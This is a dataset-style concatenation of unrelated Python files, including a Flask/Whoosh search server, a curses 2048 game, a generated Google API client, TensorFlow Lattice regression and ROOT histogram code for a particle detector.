dest="failfast",
help="Stop the test suite after the first failed test.",
)
parser.add_argument(
"--no-coverage",
action="store_false",
default=True,
dest="coverage",
help="Do not run coverage.py while running the tests.",
)
parser.add_argument(
"--no-input",
action="store_false",
default=True,
dest="interactive",
help="If the tests require input, do not prompt the user for input.",
)
args = parser.parse_args()
if args.coverage:
try:
from coverage import coverage
cov = coverage(include="doac*")
cov.start()
except ImportError:
cov = None
else:
cov = None
from django.conf import settings
from tests import settings as test_settings
settings.configure(test_settings, DEBUG=True)
from django.test.utils import get_runner
TestRunner = get_runner(settings)
runner = TestRunner(verbosity=1, interactive=args.interactive, failfast=args.failfast)
failures = runner.run_tests(["tests", ])
if cov:
cov.stop()
cov.html_report()
if failures:
sys.exit(bool(failures))
|
nilq/baby-python
|
python
|
import torch
def accuracy(pred, target):
"""Return the fraction of rows whose argmax prediction matches the target class index."""
pred = pred.float()
correct = 0
for i in range(target.size(0)):
# argmax avoids the shape/tie issues of (pred[i] == pred[i].max()).nonzero()
if pred[i].argmax() == target[i]:
correct += 1
return correct / target.size(0)
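# Illustrative example:
# pred = torch.tensor([[0.1, 0.9], [0.8, 0.2]]); target = torch.tensor([1, 1])
# accuracy(pred, target) -> 0.5 (only the first row's argmax matches its target)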
|
nilq/baby-python
|
python
|
# Function to sort an unsorted list (due to globbing) using a number
# occurring in the path.
# Author: Lukas Snoek [lukassnoek.github.io]
# Contact: lukassnoek@gmail.com
# License: 3 clause BSD
from __future__ import division, print_function, absolute_import
import os.path as op
def sort_numbered_list(stat_list):
""" Sorts a list containing numbers.
Sorts list with paths to statistic files (e.g. COPEs, VARCOPES),
which are often sorted wrong (due to single and double digits).
This function extracts the numbers from the stat files and sorts
the original list accordingly.
Parameters
----------
stat_list : list of str
list with absolute paths to files
Returns
-------
sorted_list : list of str
sorted stat_list
"""
num_list = []
for path in stat_list:
num = [str(s) for s in str(op.basename(path)) if s.isdigit()]
num_list.append(int(''.join(num)))
sorted_list = [x for y, x in sorted(zip(num_list, stat_list))]
return sorted_list
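# Illustrative example (hypothetical file names): globbing often yields
# ['cope10.nii', 'cope1.nii', 'cope2.nii'], for which sort_numbered_list
# returns ['cope1.nii', 'cope2.nii', 'cope10.nii'].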
|
nilq/baby-python
|
python
|
##############################
# support query serve for front web system
# filename:query.py
# author: liwei
# StuID: 1711350
# date: 2019.12.1
##############################
# Query construction
from whoosh import highlight
from whoosh import qparser
from whoosh import index
from flask import Flask
from flask import request
from flask import jsonify,render_template,abort, redirect, url_for,session, escape,Markup
from flask_cors import *
import re
import logging
from numpy import std
from data import xy_dict
from data import get_html,get_teacher_info,pagerank
# from audio import *
app = Flask(__name__)
CORS(app,supports_credentials=True)  # allow cross-origin requests from the front end
app.secret_key=b'\xfa\n\x08\xb9\x84I\xe5xRdE\xea\x9f\xba\xce\x81'
mysession = dict()  # custom session dict used to pass data between requests
url_dict,scores = pagerank(get_teacher_info())  # run PageRank; returns the URL-to-index mapping and the ranking scores
# logging configuration
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
logging.basicConfig(filename='my.log', level=logging.DEBUG, format=LOG_FORMAT, datefmt=DATE_FORMAT)
ix = index.open_dir("index")  # open the directory that stores the index files
# route for page snapshots
@app.route('/snapshots/<xueyuan>/<filename>',methods=["GET"])
def snapshots(xueyuan = None ,filename=None):
if filename!=None and xueyuan !=None:
return render_template('snapshots/'+xueyuan+'/'+filename)
# home page route
@app.route('/',methods=["GET"])
def index():
return render_template("index.html",query="")
# results page route
@app.route('/display/',methods=["GET","POST"])
def display_index():
return render_template("display.html",count="#",query="输入查询词")
# GET handler for the results page
@app.route('/display/<count>&<query>')
def display(count=None,query=None):
#print(query)
if 'data' in mysession.keys():
#print(mysession["data"])
return render_template("display.html",count=count,query=query,res=mysession['data'])
else:
return redirect('/display/')
# # 实现语音输入查询
# @app.route('/audio',methods=['GET','POST'])
# def audio_query():
# assert request.path == '/audio'
# # 通过语音识别API获取查询输入
# get_audio(in_path)
# # 测试代码
# filename = "./speechs/input.wav"
# signal = open(filename, "rb").read()
# rate = 16000
# token = get_token()
# msg = recognize(signal, rate, token)
# query_sentence = " "
# if "err_no" in dict(msg).keys():
# logging.warning("%d,没有获取有效语音输入!错误消息%s 错误代码%d" %( 404,msg["err_msg"],msg["err_no"]))
# return "%d,没有获取有效语音输入!错误消息%s 错误代码%d" %( 404,msg["err_msg"],msg["err_no"]), 404
# else:
# query_sentence = msg['result']
# # 记录日志
# logging.info("Audio Query sentence: %s" % query_sentence)
# res = []
# with ix.searcher() as searcher:
# # 对输入的查询文本进行解析,如果存在按域查询的需求则区分按域查询,默认采用多属性查询模式
# # mark 表示是否需要高亮学院查询区域,默认情况下需要
# highlight_xy = True
# # 默认的多域查询
# query = qparser.MultifieldParser(["content", "title", "mtext", "xueyuan"], ix.schema)
# if query_sentence.endswith("$姓名$"):
# # 按名字查询
# query = qparser.SimpleParser("title", ix.schema)
# query_sentence = query_sentence.strip('$姓名$')
# elif query_sentence.endswith("$学院$"):
# # 按学院查询
# query = qparser.SimpleParser("xueyuan", ix.schema)
# query_sentence = query_sentence.strip('$学院$')
#
# elif query_sentence.endswith("$网页$"):
# # 按网页内容查询
# query = qparser.SimpleParser("content", ix.schema)
# query_sentence = query_sentence.strip('$网页$')
#
# # print(query_sentence)
# # 引入查询解析器插件
# query.add_plugin(qparser.WildcardPlugin)
#
# # query.remove_plugin_class(qparser.WildcardPlugin)
# query.add_plugin(qparser.PrefixPlugin())
# query.add_plugin(qparser.OperatorsPlugin)
# query.add_plugin(qparser.RegexPlugin)
# query.add_plugin(qparser.PhrasePlugin)
#
# # 解析得到查询器
# q = query.parse(query_sentence)
# logging.info("Query parse result: %s" % str(q))
# print(q)
# # 获取查询结果
# result = searcher.search(q, limit=20)
# # print(result)
# # 设置碎片的属性
# # Allow larger fragments
# my_cf = highlight.ContextFragmenter(maxchars=200, surround=30)
# hf = highlight.HtmlFormatter(tagname='em', classname='match', termclass='term')
#
# hi = highlight.Highlighter(fragmenter=my_cf, formatter=hf)
# for hit in result:
# print(hit["picpath"])
# print(hit["title"])
# print(escape(hi.highlight_hit(hit, "content")))
# if hit['picpath'] == '#':
# if highlight_xy:
# res.append({"title": hit['title'],
# "xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": '#',
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# res.append({"title": hit['title'],
# "xueyuan": hit["xueyuan"],
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": '#',
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# if highlight_xy:
# res.append({"title": hit['title'],
# "xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": "images/%s/%s" % (
# hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# res.append({"title": hit['title'],
# "xueyuan": hit["xueyuan"],
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": "images/%s/%s" % (
# hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
# "pagerank": scores[url_dict[hit["url"]]]
# })
# print(len(result))
# print(res)
# count = len(result)
#
# if count == 0:
# logging.warning("%d,没有查询到相关内容!" % 404)
# return "没有查询到相关内容!", 404
# else:
# # 记录查询日志
# log = "Response: "
# for item in res:
# log = log + " (name:%s,url:%s) " % (item["title"], item["url"])
# logging.info(log)
#
# # # 基于page rank 对链接进行排序
# # res.sort(key=lambda k:(k.get("pagerank",0)),reverse = True)
# # print(res)
#
# mysession["data"] = res # 使用会话session传递参数
# return jsonify({"url": "/display/%d&%s" % (count, query_sentence)})
# Basic query handler: supports prefix, wildcard, regex, phrase and boolean-operator queries.
# Uses whoosh's Highlighter to return highlighted fragments of the matched query terms.
@app.route('/index',methods=['GET','POST'])
def base_query():
assert request.path == '/index'
#print(dict(request.form)["query"][0])
#print(dict(request.form))
query_sentence = str(dict(request.form)["query"][0])
logging.info("Query sentence: %s"%query_sentence)
res = []
with ix.searcher() as searcher:
# Parse the query text: if a field-specific query is requested, search that field only;
# otherwise fall back to the default multi-field mode.
# highlight_xy marks whether the faculty (xueyuan) field should be highlighted; on by default.
highlight_xy = True
# default multi-field query
query = qparser.MultifieldParser(["content","title","mtext","xueyuan"], ix.schema)
if query_sentence.endswith("$姓名$"):
# query by name
query =qparser.SimpleParser("title",ix.schema)
query_sentence=query_sentence.strip('$姓名$')
elif query_sentence.endswith("$学院$"):
# query by faculty (xueyuan)
query = qparser.SimpleParser("xueyuan", ix.schema)
query_sentence=query_sentence.strip('$学院$')
elif query_sentence.endswith("$网页$"):
# query by page content
query = qparser.SimpleParser("content", ix.schema)
query_sentence=query_sentence.strip('$网页$')
#print(query_sentence)
# register query-parser plugins
query.add_plugin(qparser.WildcardPlugin)
# query.remove_plugin_class(qparser.WildcardPlugin)
query.add_plugin(qparser.PrefixPlugin())
query.add_plugin(qparser.OperatorsPlugin)
query.add_plugin(qparser.RegexPlugin)
query.add_plugin(qparser.PhrasePlugin)
# parse the text into a query object
q = query.parse(query_sentence)
logging.info("Query parse result: %s"%str(q))
print(q)
# run the search and get results
result = searcher.search(q,limit=20)
# print(result)
# configure highlight fragment properties
# Allow larger fragments
my_cf = highlight.ContextFragmenter(maxchars=200, surround=30)
hf = highlight.HtmlFormatter( tagname='em', classname='match', termclass='term')
hi = highlight.Highlighter(fragmenter=my_cf,formatter=hf)
for hit in result:
print(hit["picpath"])
print(hit["title"])
print(escape(hi.highlight_hit(hit,"content")))
if hit['picpath'] =='#':
if highlight_xy:
res.append({"title": hit['title'],
"xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": '#',
"pagerank":scores[url_dict[hit["url"]]]
})
else:
res.append({"title": hit['title'],
"xueyuan": hit["xueyuan"],
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": '#',
"pagerank":scores[url_dict[hit["url"]]]
})
else:
if highlight_xy:
res.append({"title":hit['title'],
"xueyuan":Markup(hi.highlight_hit(hit, "xueyuan")),
"url":hit["url"],
'shotpath':hit['shotpath'],
"content":Markup(hi.highlight_hit(hit,"content")),
"parenturl": hit["parenturl"],
"picpath":"images/%s/%s"%(hit['picpath'].split('/')[-3],hit['picpath'].split('/')[-1]),
"pagerank": scores[url_dict[hit["url"]]]
})
else:
res.append({"title": hit['title'],
"xueyuan": hit["xueyuan"],
"url": hit["url"],
'shotpath': hit['shotpath'],
"content": Markup(hi.highlight_hit(hit, "content")),
"parenturl": hit["parenturl"],
"picpath": "images/%s/%s" % (
hit['picpath'].split('/')[-3], hit['picpath'].split('/')[-1]),
"pagerank": scores[url_dict[hit["url"]]]
})
print(len(result))
print(res)
count = len(result)
if count ==0:
logging.warning("%d,没有查询到相关内容!"%404)
return "没有查询到相关内容!",404
else:
# log the query results
log = "Response: "
for item in res:
log = log + " (name:%s,url:%s) " % (item["title"], item["url"])
logging.info(log)
# # sort results by PageRank score
# res.sort(key=lambda k:(k.get("pagerank",0)),reverse = True)
# print(res)
mysession["data"] = res # 使用会话session传递参数
return jsonify({"url":"/display/%d&%s"%(count,query_sentence)})
if __name__ == '__main__':
app.run(debug=False,use_reloader=False)
|
nilq/baby-python
|
python
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generated client library for servicecontrol version v1."""
# NOTE: This file is originally auto-generated using google-apitools then
# style-correcting hand edits were applied. New behaviour should not be
# provided by hand; please re-generate and restyle.
from __future__ import absolute_import
from apitools.base.py import base_api
from . import servicecontrol_v1_messages as messages
class ServicecontrolV1(base_api.BaseApiClient):
"""Generated client library for service servicecontrol version v1."""
MESSAGES_MODULE = messages
_PACKAGE = u'servicecontrol'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform',
u'https://www.googleapis.com/auth/servicecontrol']
_VERSION = u'v1'
_CLIENT_CLASS_NAME = u'ServicecontrolV1'
_URL_VERSION = u'v1'
_API_KEY = None
# pylint: disable=too-many-arguments
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None):
"""Create a new servicecontrol handle."""
url = url or u'https://servicecontrol.googleapis.com/'
super(ServicecontrolV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers)
self.services = self.ServicesService(self)
class ServicesService(base_api.BaseApiService):
"""Service class for the services resource."""
_NAME = u'services'
def __init__(self, client):
super(ServicecontrolV1.ServicesService, self).__init__(client)
self._method_configs = {
'check': base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'servicecontrol.services.check',
ordered_params=[u'serviceName'],
path_params=[u'serviceName'],
query_params=[],
relative_path=u'v1/services/{serviceName}:check',
request_field=u'checkRequest',
request_type_name=u'ServicecontrolServicesCheckRequest',
response_type_name=u'CheckResponse',
supports_download=False,
),
'report': base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'servicecontrol.services.report',
ordered_params=[u'serviceName'],
path_params=[u'serviceName'],
query_params=[],
relative_path=u'v1/services/{serviceName}:report',
request_field=u'reportRequest',
request_type_name=u'ServicecontrolServicesReportRequest',
response_type_name=u'ReportResponse',
supports_download=False,
),
}
self._upload_configs = {
}
def check(self, request, global_params=None):
"""Checks quota, abuse status etc. to decide whether the given
operation. should proceed. It should be called by the service
before the given operation is executed.
This method requires the `servicemanagement.services.check`
permission on the specified service. For more information, see
[Google Cloud IAM](https://cloud.google.com/iam).
Args:
request: (ServicecontrolServicesCheckRequest) input message
global_params: (StandardQueryParameters, default: None)
global arguments
Returns:
(CheckResponse) The response message.
"""
config = self.GetMethodConfig('check')
return self._RunMethod(
config, request, global_params=global_params)
def report(self, request, global_params=None):
"""Reports an operation to the service control features such as
billing, logging, monitoring etc. It should be called by the
service after the given operation is completed.
This method requires the `servicemanagement.services.report`
permission on the specified service. For more information, see
[Google Cloud IAM](https://cloud.google.com/iam).
Args:
request: (ServicecontrolServicesReportRequest) input message
global_params: (StandardQueryParameters, default: None) global
arguments
Returns:
(ReportResponse) The response message.
"""
config = self.GetMethodConfig('report')
return self._RunMethod(
config, request, global_params=global_params)
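# Hypothetical usage sketch (the request objects come from the generated
# messages module; their construction is omitted here):
# client = ServicecontrolV1()
# check_response = client.services.check(check_request)
# report_response = client.services.report(report_request)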
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import curses
from random import randrange, choice # generate and place new tile
from collections import defaultdict
letter_codes = [ord(ch) for ch in 'WASDRQwasdrq']
actions = ['Up', 'Left', 'Down', 'Right', 'Restart', 'Exit']
actions_dict = dict(zip(letter_codes, actions * 2))
def get_user_action(keyboard):
char = "N"
while char not in actions_dict:
char = keyboard.getch()
return actions_dict[char]
def transpose(field):
return [list(row) for row in zip(*field)]
def invert(field):
return [row[::-1] for row in field]
class GameField(object):
def __init__(self, height=4, width=4, win=2048):
self.height = height
self.width = width
self.win_value = win
self.score = 0
self.highscore = 0
self.reset()
def reset(self):
if self.score > self.highscore:
self.highscore = self.score
self.score = 0
self.field = [[0 for i in range(self.width)] for j in range(self.height)]
self.spawn()
self.spawn()
def move(self, direction):
def move_row_left(row):
def tighten(row): # squeeze non-zero elements together
new_row = [i for i in row if i != 0]
new_row += [0 for i in range(len(row) - len(new_row))]
return new_row
def merge(row):
pair = False
new_row = []
for i in range(len(row)):
if pair:
new_row.append(2 * row[i])
self.score += 2 * row[i]
pair = False
else:
if i + 1 < len(row) and row[i] == row[i + 1]:
pair = True
new_row.append(0)
else:
new_row.append(row[i])
assert len(new_row) == len(row)
return new_row
return tighten(merge(tighten(row)))
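# e.g. move_row_left([2, 2, 0, 2]): tighten -> [2, 2, 2, 0],
# merge -> [0, 4, 2, 0], tighten -> [4, 2, 0, 0]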
moves = {}
moves['Left'] = lambda field: \
[move_row_left(row) for row in field]
moves['Right'] = lambda field: \
invert(moves['Left'](invert(field)))
moves['Up'] = lambda field: \
transpose(moves['Left'](transpose(field)))
moves['Down'] = lambda field: \
transpose(moves['Right'](transpose(field)))
if direction in moves:
if self.move_is_possible(direction):
self.field = moves[direction](self.field)
self.spawn()
return True
else:
return False
def is_win(self):
return any(any(i >= self.win_value for i in row) for row in self.field)
def is_gameover(self):
return not any(self.move_is_possible(move) for move in actions)
def draw(self, screen):
help_string1 = '(W)Up (S)Down (A)Left (D)Right'
help_string2 = ' (R)Restart (Q)Exit'
gameover_string = ' GAME OVER'
win_string = ' YOU WIN!'
def cast(string):
screen.addstr(string + '\n')
def draw_hor_separator():
top = '┌' + ('┬──────' * self.width + '┐')[1:]
mid = '├' + ('┼──────' * self.width + '┤')[1:]
bot = '└' + ('┴──────' * self.width + '┘')[1:]
separator = defaultdict(lambda: mid)
separator[0], separator[self.height] = top, bot
if not hasattr(draw_hor_separator, "counter"):
draw_hor_separator.counter = 0
cast(separator[draw_hor_separator.counter])
draw_hor_separator.counter += 1
def draw_row(row):
cast(''.join('│{: ^5} '.format(num) if num > 0 else '│      ' for num in row) + '│')
screen.clear()
cast('SCORE: ' + str(self.score))
if 0 != self.highscore:
cast('HIGHSCORE: ' + str(self.highscore))
for row in self.field:
draw_hor_separator()
draw_row(row)
draw_hor_separator()
if self.is_win():
cast(win_string)
else:
if self.is_gameover():
cast(gameover_string)
else:
cast(help_string1)
cast(help_string2)
def spawn(self):
new_element = 4 if randrange(100) > 89 else 2
(i, j) = choice([(i, j) for i in range(self.height) for j in range(self.width) if self.field[i][j] == 0])
self.field[i][j] = new_element
def move_is_possible(self, direction):
def row_is_left_movable(row):
def change(i): # true if there'll be change in i-th tile
if row[i] == 0 and row[i + 1] != 0: # Move
return True
if row[i] != 0 and row[i + 1] == row[i]: # Merge
return True
return False
return any(change(i) for i in range(len(row) - 1))
check = {}
check['Left'] = lambda field: \
any(row_is_left_movable(row) for row in field)
check['Right'] = lambda field: \
check['Left'](invert(field))
check['Up'] = lambda field: \
check['Left'](transpose(field))
check['Down'] = lambda field: \
check['Right'](transpose(field))
if direction in check:
return check[direction](self.field)
else:
return False
def main(stdscr):
curses.use_default_colors()
game_field = GameField(win=32)
state_actions = {} # Init, Game, Win, Gameover, Exit
def init():
game_field.reset()
return 'Game'
state_actions['Init'] = init
def not_game(state):
game_field.draw(stdscr)
action = get_user_action(stdscr)
responses = defaultdict(lambda: state)
responses['Restart'], responses['Exit'] = 'Init', 'Exit'
return responses[action]
state_actions['Win'] = lambda: not_game('Win')
state_actions['Gameover'] = lambda: not_game('Gameover')
def game():
game_field.draw(stdscr)
action = get_user_action(stdscr)
if action == 'Restart':
return 'Init'
if action == 'Exit':
return 'Exit'
if game_field.move(action): # move successful
if game_field.is_win():
return 'Win'
if game_field.is_gameover():
return 'Gameover'
return 'Game'
state_actions['Game'] = game
state = 'Init'
while state != 'Exit':
state = state_actions[state]()
curses.wrapper(main)
|
nilq/baby-python
|
python
|
# https://qiita.com/taigamikami/items/6c69fc813940f838e96c
import numpy as np
import tensorflow as tf
import tensorflow_lattice as tfl
import matplotlib.pyplot as plt
import input_data
# ====================================
# Training data
# ====================================
#x_train = np.arange(-5, 5, 0.2)
#noise = np.random.normal(0, 4, x_train.shape)
#y_train = np.square(x_train) + noise
data = input_data.read_data("train")
x_train = data.T[0]
y_train = data.T[1]
batch_size = len(x_train)
# input_fn = tf.estimator.inputs.numpy_input_fn(
# {"x": x_train}, y_train, batch_size=batch_size, num_epochs=None, shuffle=True)
train_input_fn = tf.estimator.inputs.numpy_input_fn(
{"x": x_train}, y_train, batch_size=batch_size, num_epochs=1000, shuffle=False)
# ====================================
# Training setup
# ====================================
# Declare the list of features. There is only one numeric feature here; many other, more complex and useful column types exist.
feature_columns = [
tf.feature_column.numeric_column("x")
]
# Hyperparameters.
num_keypoints = 10
# hparams = tfl.CalibratedRtlHParams(
# num_keypoints=num_keypoints,
# num_lattices=5,
# lattice_rank=2,
# learning_rate=0.01)
hparams = tfl.CalibratedLinearHParams(
num_keypoints=num_keypoints,
num_lattices=10,
# lattice_rank=2,
learning_rate=0.1)
# Set feature monotonicity.
#hparams.set_feature_param('x', 'monotonicity', -1)
# Define keypoint init.
keypoints_init_fns = {
'x': lambda: tfl.uniform_keypoints_for_signal(num_keypoints,
input_min=-5.0,
input_max=5.0,
output_min=0.0,
output_max=25.0),
}
print("keypoints_init_fns: %r" % keypoints_init_fns)
# ====================================
# Train
# ====================================
# lattice_estimator = tfl.calibrated_lattice_regressor(
# feature_columns=feature_columns,
# hparams=hparams,
# keypoints_initializers_fn=keypoints_init_fns
# )
lattice_estimator = tfl.calibrated_linear_regressor(
feature_columns=feature_columns,
hparams=hparams,
keypoints_initializers_fn=keypoints_init_fns
)
# Train!
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": x_train},
y=y_train,
batch_size=batch_size,
num_epochs=1000,
shuffle=False)
train_metrics = lattice_estimator.train(input_fn=train_input_fn)
# ====================================
# Model evaluation
# ====================================
eval_metrics = lattice_estimator.evaluate(input_fn=train_input_fn)
print("train metrics: %r"% eval_metrics)
# ====================================
# Validation data
# ====================================
eval_data = input_data.read_data("eval")
x_eval = eval_data.T[0]
y_eval = eval_data.T[1]
#
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
{"x": x_eval}, y_eval, batch_size=4, num_epochs=1000, shuffle=False)
eval_metrics = lattice_estimator.evaluate(input_fn=eval_input_fn)
print("eval metrics: %r"% eval_metrics)
# ====================================
# Prediction
# ====================================
predict_data = input_data.read_data("predict")
x_predict = predict_data.T[0]
predict_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": x_predict},
y=None,
batch_size=batch_size,
num_epochs=1,
shuffle=False
)
predict_results = list(lattice_estimator.predict(input_fn=predict_input_fn))
# ====================================
# Plot the data
# ====================================
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
ax1.scatter(x_train, y_train)
y_predict = np.array([])
for prediction in predict_results:
y_predict = np.append(y_predict, prediction["predictions"][0])
ax1.plot(x_eval, y_predict, "r-")
plt.show()
|
nilq/baby-python
|
python
|
config = {
"--acoustic-scale":[0.1,float],
"--allow-partial":["false",str],
"--beam":[13,int],
"--beam-delta":[0.5,float],
"--delta":[0.000976562,float],
"--determinize-lattice":["true",str],
"--hash-ratio":[2,int],
"--lattice-beam":[8,int],
"--max-active":[7000,int],
"--max-mem":[50000000,int],
"--min-active":[200,int],
"--minimize":["false",str],
"--phone-determinize":["true",str],
"--prune-interval":[25,int],
"--word-determinize":["true",str],
"--word-symbol-table":["",str]
}
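# A possible way to use this table (assumed, for illustration only): render each
# non-empty default into a Kaldi-style command-line flag.
# cmdline_opts = ["%s=%s" % (opt, val) for opt, (val, _t) in config.items() if val != ""]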
|
nilq/baby-python
|
python
|
"""
Odoo client using Openerp proxy
"""
# https://pypi.org/project/openerp_proxy/
from openerp_proxy import Client as erpClient
class Client():
"""
Odoo client
"""
def __init__(self, username:str, password:str = '', database:str = '', host:str = '', port:int = 443, protocol:str = 'json-rpcs'):
"""
Initialize parameters here
"""
if len(username) == 0:
raise ValueError('Missing username argument')
self.username = username
self.password = password
self.database = database
self.host = host
self.port = port
self.protocol = protocol
self.client = None # Set this in connect or enter
self.user = None
def connect(self):
"""
Connect to Odoo
"""
self.client = erpClient(
host=self.host,
dbname=self.database,
user=self.username,
pwd=self.password,
protocol=self.protocol,
port=self.port)
# Check connection by fetching user name
self.user = self.client.user
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
pass
def search(self, db_name, filters):
"""
Search ids for db_name using filters
"""
return self.client[db_name].search(filters)
def search_read(self, db_name, filters):
"""
Search data for db_name using filters
"""
return self.client[db_name].search_read(filters)
def read(self, db_name, ids, fields=None):
"""
Read data using ids list or int. Fields is optional
"""
return self.client[db_name].read(ids, fields)
def write(self, db_name, ids, field):
"""
Write data to db_name with id
"""
return self.client[db_name].write(ids, field)
def create(self, db_name, fields):
return self.client[db_name].create(fields)
def start_tracking(self, args):
return self.client['project.task'].start_tracking(args)
def terminate_tracking(self, args):
return self.client['project.task'].terminate_tracking(args)
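# Example usage (hypothetical credentials, for illustration only):
# with Client('admin', password='secret', database='mydb', host='odoo.example.com') as odoo:
#     ids = odoo.search('res.partner', [('is_company', '=', True)])
#     partners = odoo.read('res.partner', ids, fields=['name'])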
|
nilq/baby-python
|
python
|
import ROOT
import numpy as np
# fast index lookup
from melp.libs.misc import index_finder
def save_histo(filename: str, dt_dict: dict):
histo_file = ROOT.TFile.Open(filename, "RECREATE")
for keys in dt_dict.keys():
name_z = str(keys) + "z"
name_phi = str(keys) + "phi"
histo_file.WriteObject(dt_dict[keys][0], name_z)
histo_file.WriteObject(dt_dict[keys][1], name_phi)
def read_histo(filename: str) -> dict:
global histo_file
histo_file = ROOT.TFile.Open(filename, "READ")
dt_dict = {}
for key in histo_file.GetListOfKeys():
h = key.ReadObj()
name = h.GetName()
dict_key = name.replace("_z", "")
dict_key = int(dict_key.replace("_phi", ""))
if dict_key not in dt_dict.keys():
dt_dict[dict_key] = [None, None]
if "z" in name:
dt_dict[dict_key][0] = h
# print(h)
elif "phi" in name:
dt_dict[dict_key][1] = h
return dt_dict
# ---------------------------------------
#
# Generates dictionary with ROOT TH1D histograms
# -> dict[tileid] = [hist_z, hist_phi]
#
def fill_dt_histos(detector, ttree_mu3e, histo_options: tuple) -> dict:
cluster_counter = 0
hist_dict = {}
nbins, lo, hi = histo_options
# Generating empty histos:
for tile in detector.TileDetector.tile:
histo_name_z = str(tile) + "_z"
histo_name_phi = str(tile) + "_phi"
hist_dict[tile] = [ROOT.TH1D(histo_name_z, histo_name_z, nbins, lo, hi),
ROOT.TH1D(histo_name_phi, histo_name_phi, nbins, lo, hi)]
# tilehits = ROOT.vector('int')()
# tilehitstime = ROOT.vector('double')()
# ttree_mu3e.SetBranchStatus("tilehit_tile", 1)
# ttree_mu3e.SetBranchStatus("tilehit_time", 1)
# ttree_mu3e.SetBranchAddress("tilehit_tile", tilehits)
# ttree_mu3e.SetBranchAddress("tilehit_time", tilehitstime)
for frame in range(ttree_mu3e.GetEntries()):
ttree_mu3e.GetEntry(frame)
# Printing status info
if frame % 10000 == 0:
print("Searching clusters. Progress: ", np.round(frame / ttree_mu3e.GetEntries() * 100), " % , Found: ",
cluster_counter, end='\r')
# TODO: index_finder cant handle multiple events on one tile in one frame!!!
# --> skipping frame (looses some data)
# Analyzing frame
for hit_tile_index in range(len(ttree_mu3e.tilehit_tile)):
hit_tile = ttree_mu3e.tilehit_tile[hit_tile_index]
# -----------------------------
# Look for clusters in z-dir
neighbour_z_id = detector.TileDetector.getNeighbour(hit_tile, "right")
if neighbour_z_id in ttree_mu3e.tilehit_tile and neighbour_z_id is not False:
# find associated tile hit
hit_tile_assoc = index_finder(list(ttree_mu3e.tilehit_tile), neighbour_z_id)
# workaround for multiple hits in the same tile
try:
hit_tile_assoc = int(*hit_tile_assoc)
except (TypeError, ValueError):
continue
# calculate dt
# TODO: TOF maybe with edep ?
hit_time_1 = ttree_mu3e.tilehit_time[hit_tile_index] # + detector.TileDetector.tile[hit_tile].dt_truth
hit_time_2 = ttree_mu3e.tilehit_time[hit_tile_assoc] # + detector.TileDetector.tile[
# neighbour_z_id].dt_truth
dt = hit_time_2 - hit_time_1
# Fill histogram
hist_dict[hit_tile][0].Fill(dt)
cluster_counter += 1
# -----------------------------
# Look for clusters in phi-dir
neighbour_phi_id = detector.TileDetector.getNeighbour(hit_tile, "up")
if neighbour_phi_id in ttree_mu3e.tilehit_tile and neighbour_phi_id is not False:
hit_tile = ttree_mu3e.tilehit_tile[hit_tile_index]
# find associated tile hit
hit_tile_assoc = index_finder(list(ttree_mu3e.tilehit_tile), neighbour_phi_id)
# workaround for multiple hits in the same tile
try:
hit_tile_assoc = int(*hit_tile_assoc)
except (TypeError, ValueError):
continue
# calculate dt
# TODO: TOF maybe with edep ?
hit_time_1 = ttree_mu3e.tilehit_time[hit_tile_index] # + detector.TileDetector.tile[hit_tile].dt_truth
hit_time_2 = ttree_mu3e.tilehit_time[hit_tile_assoc] # + detector.TileDetector.tile[
# neighbour_phi_id].dt_truth
dt = hit_time_2 - hit_time_1
# Fill histogram
hist_dict[hit_tile][1].Fill(dt)
cluster_counter += 1
print("Searching clusters. Progress: ", 100, " % , Found: ", cluster_counter)
return hist_dict
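# Illustrative round trip (assumes a dt_dict produced by fill_dt_histos):
# save_histo("dt_histos.root", dt_dict)
# restored = read_histo("dt_histos.root")   # -> {tile_id: [hist_z, hist_phi], ...}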
|
nilq/baby-python
|
python
|
import logging
from collections import namedtuple
import magic
from io import BytesIO
